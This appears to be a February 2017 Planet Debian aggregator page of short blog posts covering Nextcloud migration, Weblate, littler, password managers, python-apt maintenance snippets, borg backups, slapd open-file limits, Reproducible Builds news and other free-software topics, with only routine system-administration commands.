Ingo Juergensmann: Migrating from Owncloud 7 on Debian to Nextcloud 11

Fri, 17 Feb 2017 23:19:00 +0000

These days I got a mail from my hosting provider stating that my Owncloud instance is insecure, because the online scan from scan.nextcloud.com mailed them. However the scan seemed quite bogus: it reported some issues that were listed as already solved in Debian's changelog file. But unfortunately the last entry in the changelog was on January 5th, 2016. So, there has been more than a whole year without security updates for Owncloud in Debian stable.

In a discussion with the Nextcloud team I complained a little bit that the scan/check is not appropriate. The Nextcloud team replied very helpfully with additional information, such as two bug reports in Debian clarifying that the Owncloud package will most likely be removed in the next release: #816376 and #822681.

So, as there is no nextcloud package in Debian unstable as of now, there was no other way than to manually upgrade & migrate to Nextcloud. This went fairly well:

ownCloud 7 -> ownCloud 8.0 -> ownCloud 8.1 -> ownCloud 8.2 -> ownCloud 9.0 -> ownCloud 9.1 -> Nextcloud 10 -> Nextcloud 11

There were some smaller caveats:

  • When migrating from OC 9.0 to OC 9.1 you need to migrate your addressbooks and calendars as described in the OC 9.0 Release Notes.
  • When migrating from OC 9.1 to Nextcloud 10, the OC 9.1 version is higher than expected by the Nextcloud upgrade script, so it warns that you can't downgrade your installation. The fix was simply to change the OC version in config.php (a minimal sketch follows at the end of this post).
  • The Documents app of OC 7 is no longer available in Nextcloud 11 and is replaced by the Collabora app, which is way more complex to set up.

The installation and setup of the Docker image for collabora/code was the main issue, because I wanted to be able to edit documents in my cloud. For some reason Nextcloud couldn't connect to my Docker installation. After some web searches I found "Can't connect to Collabora Online", which led me to the next entry in the Nextcloud support forum. But in the end it was this posting that finally made it work for me. In short, I needed to add:

DOCKER_OPTS="--storage-driver=devicemapper"

to /etc/default/docker.

So, in the end everything worked out well and my cloud instance is secure again. :-)

UPDATE 2017-02-18 10:52: Sadly, with that working Collabora Online container from Docker, I now face this issue of zombie processes for loolforkit inside of that container.
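Regarding the config.php tweak in the caveats above, here is a minimal sketch of what such an edit looks like (the exact version string is illustrative only; check your own installation before attempting the upgrade):

<?php
$CONFIG = array (
  // ... all other settings unchanged ...
  'version' => '9.1.0.0',  // lowered so the Nextcloud 10 upgrade script accepts the step
);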



Michal Čihař: What's coming in Weblate 2.12

Fri, 17 Feb 2017 11:00:25 +0000


Weblate 2.12 should be released by the end of February, so it's now pretty much clear what will be in it. Let's look at some of the upcoming features.

There were many improvements in search-related features. They got performance improvements (this is especially noticeable on site-wide search). Additionally you can now search for strings within a translation project. On a related topic, search and replace is now available for component- or project-wide operations, which can help you in case of massive renaming in your translations.

We have worked on improving machine translations as well; this time we've added support for Yandex. In case you know some machine translation service which we do not yet support, please submit it to our issue tracker.

The biggest improvement so far comes to the visual context feature - it allows you to upload screenshots which are later shown to translators to give them a better idea of where and in which context the translation is used. So far you had to manually upload a screenshot for every source string, which was far from easy to use. With Weblate 2.12 (and this is already available on Hosted Weblate right now) the screenshot management got way better.

There is now a separate interface to manage screenshots (see the screenshots for Weblate as an example). You can assign every screenshot to multiple source strings, and you can also let Weblate automatically recognize texts on the screenshots using OCR and suggest strings to assign. This can save you quite a lot of effort, especially with screenshots containing many strings. This feature is still in an early phase, so the suggestions are not always 100% matching, but we're working to improve them further.

There will be some more features as well; you can look at our 2.12 milestone on GitHub to follow the progress.





Joey Hess: Presenting at LibrePlanet 2017

Fri, 17 Feb 2017 03:56:05 +0000


I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!)

After attending for four years, I finally thought it was time to perhaps speak at it.

Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the  Free Software Awards and discuss pressing threats and important opportunities for software freedom.

Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998."

That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone.

Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.

-- Here's a sneak peek at LibrePlanet 2017: Register today!

I'll be giving some variant of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available; see the talks page.




Dirk Eddelbuettel: littler 0.3.2

Fri, 17 Feb 2017 01:20:00 +0000

The third release of littler as a CRAN package is now available, following in the now more than ten-year history as a package started by Jeff in the summer of 2006, and joined by me a few weeks later.

littler is the first command-line interface for R and predates Rscript. It is still faster, and in my very biased eyes better, as it allows for piping as well as shebang scripting via #!, uses command-line arguments more consistently and still starts faster. It prefers to live on Linux and Unix, has its difficulties on OS X due to yet-another-braindeadedness there (who ever thought case-insensitive filesystems were a good idea?) and simply does not exist on Windows (yet -- the build system could be extended -- see RInside for an existence proof, and volunteers welcome!).

This release brings several new example scripts to run package checks, use the extraordinary R Hub, download RStudio daily builds, and more -- see below for details. No internals were changed. The NEWS file entry is below.

Changes in littler version 0.3.2 (2017-02-14)

Changes in examples
  • New scripts getRStudioServer.r and getRStudioDesktop.r to download daily builds, currently defaults to Ubuntu amd64
  • New script c4c.r calling rhub::check_for_cran()
  • New script rd2md.r to convert Rd to markdown.
  • New script build.r to create a source tarball.
  • The installGitHub.r script now uses package remotes (PR #44, #46)

Courtesy of CRANberries, there is a comparison to the previous release. Full details for the littler release are provided as usual at the ChangeLog page. The code is available via the GitHub repo, from tarballs off my littler page and the local directory here -- and now of course all from its CRAN page and via install.packages("littler"). Binary packages are available directly in Debian as well as soon via Ubuntu binaries at CRAN thanks to the tireless Michael Rutter.

Comments and suggestions are welcome at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.



Craig Sanders: New D&D Cantrip

Thu, 16 Feb 2017 08:01:36 +0000

Name: Alternative Fact
Level: 0
School: EN
Time: 1 action
Range: global, contagious
Components: V, S, M (one racial, cultural or religious minority to blame)
Duration: Permanent (irrevocable)
Classes: Cleric, (Grand) Wizard, Con-man Politician

The caster can tell any lie, no matter how absurd or outrageous (in fact, the more outrageous the better), and anyone hearing it (or hearing about it later) with an INT of 10 or less will believe it instantly, with no saving throw. They will defend their new belief to the death – theirs or yours.

This belief can not be disbelieved, nor can it be defeated by any form of education, logic, evidence, or reason. It is completely incurable. Dispel Magic does not work against it, and Remove Curse is also ineffectual.

New D&D Cantrip is a post from: Errata




Antoine Beaupré: A look at password managers

Wed, 15 Feb 2017 17:00:00 +0000

As we noted in an earlier article, passwords are a liability and we'd prefer to get rid of them, but the current reality is that we do use a plethora of passwords in our daily lives. This problem is especially acute for technology professionals, particularly system administrators, who have to manage a lot of different machines. But it also affects regular users who still use a large number of passwords, from their online bank to their favorite social-networking site. Despite the remarkable memory capacity of the human brain, humans are actually terrible at recalling even short sets of arbitrary characters with the precision needed for passwords. Therefore humans reuse passwords, make them trivial or guessable, write them down on little paper notes and stick them on their screens, or just reset them by email every time. Our memory is undeniably failing us and we need help, which is where password managers come in. Password managers allow users to store an arbitrary number of passwords and just remember a single password to unlock them all.

But there is a large variety of password managers out there, so which one should we be using? At my previous job, an inventory was done of about 40 different free-software password managers in different stages of development and of varying quality. So, obviously, this article will not be exhaustive, but will instead focus on a smaller set of some well-known options that may be interesting to readers.

KeePass: the popular alternative

The most commonly used password-manager design pattern is to store passwords in a file that is encrypted and password-protected. The most popular free-software password manager of this kind is probably KeePass. An important feature of KeePass is the ability to auto-type passwords in forms, most notably in web browsers. This feature makes KeePass really easy to use, especially considering it also supports global key bindings to access passwords. KeePass databases are designed for simultaneous access by multiple users, for example, using a shared network drive.

KeePass has a graphical interface written in C#, so it uses the Mono framework on Linux. A separate project, called KeePassX, is a clean-room implementation written in C++ using the Qt framework. Both support the AES and Twofish encryption algorithms, although KeePass recently added support for the ChaCha20 cipher. AES key derivation is used to generate the actual encryption key for the database, but the latest release of KeePass also added using Argon2, which was the winner of the July 2015 password-hashing competition. Both programs are more or less equivalent, although the original KeePass seems to have more features in general. The KeePassX project has recently been forked into another project now called KeePassXC that implements a set of new features that are pres[...]





Holger Levsen: Debian has installer images with non-free firmware included

Wed, 15 Feb 2017 10:05:20 +0000


Even though they are impossible to find without using a search engine or bookmarks, they exist.

Bookmark them now. Or use a search engine later.




Jamie McClelland: Re-thinking Web App Security

Wed, 15 Feb 2017 02:21:54 +0000

An organizer friend interested in activating a rapid response network to counter Trump-era ICE raids on immigrants asked me about any existing simple and easy tools that could send out emergency SMS/text message alerts. I thought about it and ended up writing my first pouchdb web application to accomplish the task.

For the curious, you can see it in action and browse the source code. To use it to send SMS, you have to register for a Twilio account - you can get a free account that has very restricted SMS sending capability or pay for full functionality.

The project is unlike anything I have done before. I chose pouchdb because it stores all of your contacts in your browser, not on a server somewhere in the so-called cloud. (You can also choose to sync to a server, a feature I have not yet implemented.) The implications of storing your data locally are quite profound.

Classic Web App

Let's first consider the more common web application: you visit a web site (the same web site that your colleagues visit, or in the case of a massive application like gmail.com, the same web site that everyone in the world visits). Then, you log in with your own unique username and password, which grants you access to the portion of the database that you are supposed to have access to.

For most use cases, this model is fairly ideal:

  • If you have a technically competent host, your data is backed up regularly and the database is available nearly 100% of the time
  • If you have a politically trustworthy host, your host will notify you and put up a fight before turning any of your data over to a government agent
  • If you drop your phone in the toilet you can always login from another computer to access your data
  • If you save your password in your browser and your laptop is stolen, you can always change your password to prevent the thief from accessing your data
  • You can easily share your data with others by creating new usernames and passwords

However, there are some downsides:

  • If your host is not technically competent or politically trustworthy, you could lose all of your data to a hard drive crash or subpoena
  • Even if your host is competent, all of your data is one previously undiscovered vulnerability away from being hacked
  • Even if your host is politically trustworthy, you cannot always stop a subpoena, particularly given the legal escalations of tools like national security letters

pouchdb, no sync

Assuming you are accessing your database on a device with an encrypted disk and you manage your own backups, pouchdb without synchronizing provides the most privacy and autonomy. You have complete control of your data and you are not dependent on any server operator. However, the trade-offs are harsh:

  • Availability: if you lose[...]



Clint Adams: Tom's birthday happens every year

Wed, 15 Feb 2017 00:57:09 +0000

(image)

“Sure,” she said, while having a drink for breakfast at the post office.

Posted on 2017-02-15
Tags: mintings



Daniel Stender: APT programming snippets for Debian system maintenance

Wed, 15 Feb 2017 00:00:00 +0000

The Python API for the Debian package manager APT is useful for writing practical system maintenance scripts which go beyond shell scripting capabilities. There are Python 2 and Python 3 libraries for that available as packages, as well as documentation in the package python-apt-doc. If that's also installed, the documentation can be found in /usr/share/doc/python-apt-doc/html/index.html, and there are also a couple of example scripts shipped into /usr/share/doc/python-apt-doc/examples. The libraries mainly consist of Python bindings for the libapt-inst and libapt-pkg C++ core libraries of the APT package manager, which makes processing very fast. Debugging symbols are also available as packages (python{,3}-apt-dbg). The module apt_inst provides features like reading from binary packages, while apt_pkg resembles the functions of the package manager. There is also the apt abstraction layer, which provides more convenient access to the library; for example, apt.cache.Cache() can be used to behave like apt-get:

from apt.cache import Cache
mycache = Cache()
mycache.update()                    # apt-get update
mycache.open()                      # re-open
mycache.upgrade(dist_upgrade=True)  # apt-get dist-upgrade
mycache.commit()                    # apply the selections

As widely known, there is a feature of dpkg which helps to move a package inventory from one installation to another by just using a text file with a list of installed packages. A selections list containing all installed packages can easily be generated with $ dpkg --get-selections > selections.txt. The resulting file then looks something like this:

$ cat selections.txt
0ad                        install
0ad-data                   install
0ad-data-common            install
a2ps                       install
abi-compliance-checker     install
abi-dumper                 install
abigail-tools              install
accountsservice            install
acl                        install
acpi                       install
[...]

The counterpart of this operation (--set-selections) can be used to reinstall (add) the complete package inventory on another installation or computer (this needs superuser rights), as explained in the manpage dpkg(1). No problem so far. The problem is: if that list contains a package which can't be found in any of the package inventories set up in /etc/apt/sources.list(.d/) on the target system, dpkg stops the whole process:

# dpkg --set-selections < selections.txt
dpkg: warning: package not in database at line 524: google-[...]
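Building on the selections list from above, here is a short sketch of my own (not from the original post) that uses the apt abstraction layer to filter out packages unknown to the configured sources before calling dpkg --set-selections:

#!/usr/bin/python3
# filter-selections.py: drop selections not found in any configured package inventory
from apt.cache import Cache

cache = Cache()  # reads the inventories configured in /etc/apt/sources.list(.d/)

with open('selections.txt') as src, open('selections.filtered', 'w') as dst:
    for line in src:
        if not line.strip():
            continue
        package = line.split()[0]
        if package in cache:   # Cache supports membership tests by package name
            dst.write(line)
        else:
            print('skipping unavailable package:', package)

The resulting selections.filtered can then be fed to dpkg --set-selections without the process aborting.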



Julian Andres Klode: jak-linux.org moved / backing up

Tue, 14 Feb 2017 23:52:58 +0000

In the past two days, I moved my main web site jak-linux.org (and jak-software.de) from a very old contract at STRATO over to something else: the domains are registered with INWX and the hosting is handled by uberspace.de. Encryption is provided by Let's Encrypt.

I requested the domain transfer from STRATO on Monday at 16:23, received the auth codes at 20:10 and the .de domain was transferred completely by 20:36 (about 20 minutes if you count my overhead). The .org domain I had to ACK, which I did at 20:46, and at 03:00 I received the notification that the transfer was successful (I think there was some registrar ACKing involved there). So the whole transfer took about 10 1/2 hours, or 7 hours since I retrieved the auth code. I think that's quite a good time!

And, for those of you who don't know: uberspace is a shared hoster that basically just gives you an SSH shell account, directories for you to drop files in for the http server, and various tools to add subdomains, certificates, and virtual users to the mailserver. You can also run your own custom-built software and open ports in their firewall. That's quite cool.

I'm considering migrating the blog away from WordPress at some point in the future – having a more integrated experience is a bit nicer than having my web presence split over two sites. I'm unsure if I shouldn't add something like Cloudflare there – I don't want to overload the servers (but I only serve static pages, so how much load is this really going to get?).

in other news: off-site backups

I also recently started doing off-site backups via borg to a server operated by the wonderful rsync.net. For those of you who do not know rsync.net: you basically get SSH to a server where you can upload your backups via common tools like rsync, scp, or you can go crazy and use git-annex, borg, attic; or you could even just plain zfs send your stuff there. The normal price is $0.08 per GB per month, but there is a special borg price of $0.03 (that price does not include snapshotting or support, really). You can also get a discounted normal account for $0.04 if you find the correct code on Hacker News, or other discounts for open source developers, students, etc. – you just have to send them an email.

Finally, I must say that uberspace and rsync.net feel similar in spirit. Both heavily emphasise the command line, and don't really have any fancy click stuff. I like that.
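For the curious, the borg side of such a setup needs only a couple of commands; the hostname and repository name below are made up:

$ borg init --encryption=repokey user@usw-s000.rsync.net:backups
$ borg create --stats user@usw-s000.rsync.net:backups::$(date +%F) ~/

The first command creates an encrypted repository on the remote host; the second pushes a deduplicated archive named after the current date.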



Steve McIntyre: Start the fans please!

Tue, 14 Feb 2017 23:32:00 +0000


This probably won't mean much to people outside the UK, I'm guessing. Sorry! :-)

The Crystal Maze was an awesome fun game show on TV in the UK in the 1990s. Teams would travel through differently-themed zones, taking on challenges to earn crystals for later rewards in the Crystal Dome. I really enjoyed it, as did just about everybody my age that I know of...

A group have started up a new Crystal Maze attraction in London and Manchester, giving some of us a chance of indulging our nostalgia directly in a replica of the show's setup! Neil McGovern booked a load of tickets and arranged for a large group of people to go along this weekend.

It was amazing! (Sorry!) I ended up captaining one of the 4 teams, and our team ("Failure is always an option!") scored highest in the final game - catching bits of gold foil flying around in the Dome. It was really, really fun and I'd heartily recommend it to other folks who like action games and puzzle solving.


I just missed the biting scorn of the original show presenter, Richard O'Brien, but our "Maze Master" Boudica was great fun and got us all pumped up and working together.




Sven Hoexter: moto g falcon up and running with LineageOS 14.1 nightly

Tue, 14 Feb 2017 09:23:07 +0000

After a few weeks of running Exodus on my moto g falcon, I've now done the full wipe again and moved on to the LineageOS nightly from 20170213, though that build is no longer online at the moment. It's running smoothly so far for me, but there was an issue with the Google Play edition of the phone according to Reddit. Since I don't use gapps anyway, I don't care.

The only issue I see so far is that I cannot reach the flash menu in the camera app. It's hidden behind a grey bar. Not nice, but not a show stopper for me either.




Arturo Borrero González: About process limits

Tue, 14 Feb 2017 08:24:00 +0000

The other day I had to deal with an outage in one of our LDAP servers, which is running the old Debian Wheezy (yeah, I know, we should update it). We are running openldap, the slapd daemon. And after searching the log files, the cause of the outage was obvious:

[...]
slapd[7408]: warning: cannot open /etc/hosts.allow: Too many open files
slapd[7408]: warning: cannot open /etc/hosts.deny: Too many open files
slapd[7408]: warning: cannot open /etc/hosts.allow: Too many open files
slapd[7408]: warning: cannot open /etc/hosts.deny: Too many open files
slapd[7408]: warning: cannot open /etc/hosts.allow: Too many open files
slapd[7408]: warning: cannot open /etc/hosts.deny: Too many open files
[...]

[Please read "About process limits, round 2" for updated info on this issue]

I couldn't believe that openldap is using tcp_wrappers (or libwrap), an ancient piece of software that hasn't been updated for years, replaced in many other ways by more powerful tools (like nftables). I was blinded by this and ran to open a Debian bug against openldap: #854436 (openldap: please don't use tcp-wrappers with slapd). The reply from Steve Langasek was clear:

If people are hitting open file limits trying to open two extra files, disabling features in the codebase is not the correct solution.

Obviously, the problem was somewhere else. I started investigating system limits, which seem to have two main components:

  • system-wide limits (you tune these via sysctl; they live in the kernel)
  • user/group/process limits (via limits.conf, ulimit and prlimit)

According to my searching, my slapd daemon was being hit by the latter. I reviewed the default system-wide limits and they seemed OK. So, let's change the other limits.

Most of the documentation around the internet points you to an /etc/security/limits.conf file, which is then read by pam_limits. You can check current limits using the ulimit bash builtin. In the case of my slapd:

arturo@debian:~% sudo su openldap -s /bin/bash
openldap@debian:~% ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 0
file size               (blocks, -f) unlimited
pending signals                 (-i) 7915
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1024
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) u[...]
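For reference, entries in that file follow the format <domain> <type> <item> <value>, so raising the open-files limit for the openldap user would look something like this (values picked arbitrarily for illustration):

# /etc/security/limits.conf
openldap  soft  nofile  4096
openldap  hard  nofile  8192

Though, as the follow-up post (round 2) explains, this alone did not solve it for slapd, which reads its limit only once at startup.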



Reproducible builds folks: Reproducible Builds: week 94 in Stretch cycle

Tue, 14 Feb 2017 00:19:05 +0000

Here's what happened in the Reproducible Builds effort between Sunday February 5 and Saturday February 11 2017:

Upcoming events

  • Holger proposed a hackathon with various possible dates -- please reply with your preferred dates!
  • A "Reproducible builds: Status update" CfP was submitted for Debconf17 in Montreal.

Patches sent upstream

  • pnmixer (Chris Lamb)
  • cloud-sptheme (Chris Lamb)
  • python-hypothesis (Chris Lamb)
  • cython (Jelmer Vernooij)

Packages reviewed and fixed, and bugs filed

Chris Lamb:
  • #854332 filed against cloud-sptheme.
  • #854512 filed against ftpcopy.
  • #854549 filed against python-hypothesis.

Daniel Shahaf:
  • #854492 filed against xlsx2csv.
  • #854541 filed against sogo.

"Z. Ren":
  • #854293 filed against manpages-tr.
  • #854294 filed against regina-rexx.
  • #854362 filed against fonts-uralic.

Reviews of unreproducible packages

83 package reviews have been added, 8 have been updated and 32 have been removed this week, adding to our knowledge about identified issues.

5 issue types have been added:
  • randomness_in_swf_files_generated_by_as3compile
  • randomness_in_t3g_files_generated_tslmendian
  • absolute_build_paths_in_dot_packlist_file_generated_by_perl_extutils_packlist
  • formatdb_from_ncbi_blastplus_captures_build_time
  • timestamp_and_build_path_captured_by_python_cheetah

1 issue type has been updated:
  • build_id_differences_only

Weekly QA work

During our reproducibility testing, the following FTBFS bugs have been detected and reported by:
  • Chris Lamb (7)
  • gregory bahde (1)

diffoscope development

diffoscope versions 71, 72, 73, 74 & 75 were uploaded to unstable by Chris Lamb:

Chris Lamb:

New features:
  • Add --exclude option. (Closes: #854783)
  • Apply --max-report-size to --text reports. (Closes: #851147)
  • Add a machine-readable JSON output format. (Closes: #850791)
  • Show results from debugging packages last. (Closes: #820427)
  • Specify lang="en" in HTML output. (re. #849411)

Bug fixes:
  • Fix errors when comparing directories with non-directories. (Closes: #835641)
  • Clean all temp files in the signal handler thread instead of attempting to bubble the exception back to the main thread. (Closes: #852013)
  • Correct logic of module_exists, ensuring we correctly skip tests when python3-debian is not installed. (Closes: #854745)
  • Extract archive members using an auto-incrementing integer, avoiding the need to sanitise filenames. (Closes: #854723)
  • Importing submodules (ie. parent.child) will attempt to import parent, so we must catch that. (Closes: #854670)
  • Add missing Recommends for comparators. (Closes: #854655)
Devi[...]



Elizabeth Ferdman: 10 Week Progress Update for PGP Clean Room

Tue, 14 Feb 2017 00:00:00 +0000

This Valentine’s Day I’m giving everyone the gift of GIFs! Because who wants to stare at a bunch of code? Or read words?! I’ll make this short and snappy since I’m sure you’re looking forward to a romantic night with your terminal.

A script called create-raid already exists in the main repository, so I decided to add an activity for it in the main menu.

(image)


Here’s what the default activity for creating the master and subkeys will look like:

(image)


This activity should make key generation faster and more convenient for the user. The dialog allows the user to enter additional UIDs at the same time as she initially creates the keys (there’s another activity for adding UIDs later). The dialog won’t ask for a comment in the UID, just name and email.

The input boxes come with some defaults that were outlined in the wiki for this project, such as rsa4096 for the master key and 1y for the expiry. However, the user can still enter her own values for fields like algo and expiry. The user won't customize usage here, though; there are separate activities for creating a custom primary key and custom subkeys. Here, the user creates a master key [SC], an encryption key [E], and optionally an additional signing [SC], encryption [E], and authentication [A] key.
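For comparison, those defaults expressed as a hypothetical GnuPG batch file (the gpg --batch --generate-key format; the name and email are placeholders, and the clean room scripts may well drive GnuPG differently):

%echo generating an rsa4096 master key with an rsa4096 encryption subkey, expiring in 1y
Key-Type: RSA
Key-Length: 4096
Key-Usage: sign
Subkey-Type: RSA
Subkey-Length: 4096
Subkey-Usage: encrypt
Name-Real: Jane Doe
Name-Email: jane@example.org
Expire-Date: 1y
%commit

(GnuPG always sets the cert capability on the primary key, which is what gives the [SC] combination described above.)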

The last three weeks of the internship will consist of implementing more of the frontend dialogs for the activities in the main menu, validating user input, and testing.

Thanks for reading <3




Vincent Sanders: The minority yields to the majority!

Mon, 13 Feb 2017 23:01:29 +0000

Deng Xiaoping (who succeeded Mao) expounded this view and obviously did not depend on a minority to succeed. In open source software projects we often find ourselves implementing features of interest to a minority of users to keep our software relevant to a larger audience.

As previously mentioned, I contribute to the NetSurf project, and the browser natively supports numerous toolkits for numerous platforms. This produces many challenges in development to obtain the benefits of a more diverse user base. As part of the recent NetSurf developer weekend we took the opportunity to review all the frontends to make a decision on their future sustainability.

Each of the nine frontend toolkits was reviewed in turn and the results of that discussion published. This task was greatly eased because we were able to hold the discussion face to face; over time I have come to the conclusion that some tasks in open source projects greatly benefit from this form of interaction.

Coding and the day-to-day discussions around it can be easily accommodated via IRC and email. Decisions affecting a large area of code are much easier with the subtleties of direct interpersonal communication. An example of this is our decision to abandon the cocoa frontend (the toolkit used on Mac OS X), set against the decision to keep the windows frontend.

The cocoa frontend was implemented by Sven Weidauer in 2011; unfortunately Sven did not continue contributing to this frontend afterwards, and it has become the responsibility of the core team to maintain. Because NetSurf has a comprehensive CI system that compiles the master branch on every commit, any changes that negatively affected the cocoa frontend were immediately obvious.

Thus issues with the compilation were fixed promptly, but because these fixes were only ever compile-tested, and at some point the Mac OS X build environments changed, the result was an application that crashes when used. Despite repeatedly asking for assistance to fix the cocoa frontend over the last eighteen months, no one had come forward.

And when the topic was discussed amongst the developers it quickly became apparent that no one had any objections to removing the cocoa support. In contrast, we decided to keep the windows frontend, despite it having many issues similar to cocoa's. There was almost immediate consensus on the decision, despite each individual prior to the discussion not advocating any position.

This was a single example but it highlights the benefits of a disparate development team having a physical [...]



Petter Reinholdtsen: Ruling ignored our objections to the seizure of popcorn-time.no (#domstolkontroll)

Mon, 13 Feb 2017 20:30:00 +0000

A few days ago, we received the ruling from my day in court. The case in question is a challenge of the seizure of the DNS domain popcorn-time.no. The ruling simply did not mention most of our arguments, and seemed to take everything ØKOKRIM said at face value, ignoring our demonstration and explanations. But it is hard to tell for sure, as we still have not seen most of the documents in the case and thus were unprepared and unable to contradict several of the claims made in court by the opposition. We are considering an appeal, but it is partly a question of funding, as it is costing us quite a bit to pay for our lawyer. If you want to help, please donate to the NUUG defense fund.

The details of the case, as far as we know it, is available in Norwegian from the NUUG blog. This also include the ruling itself.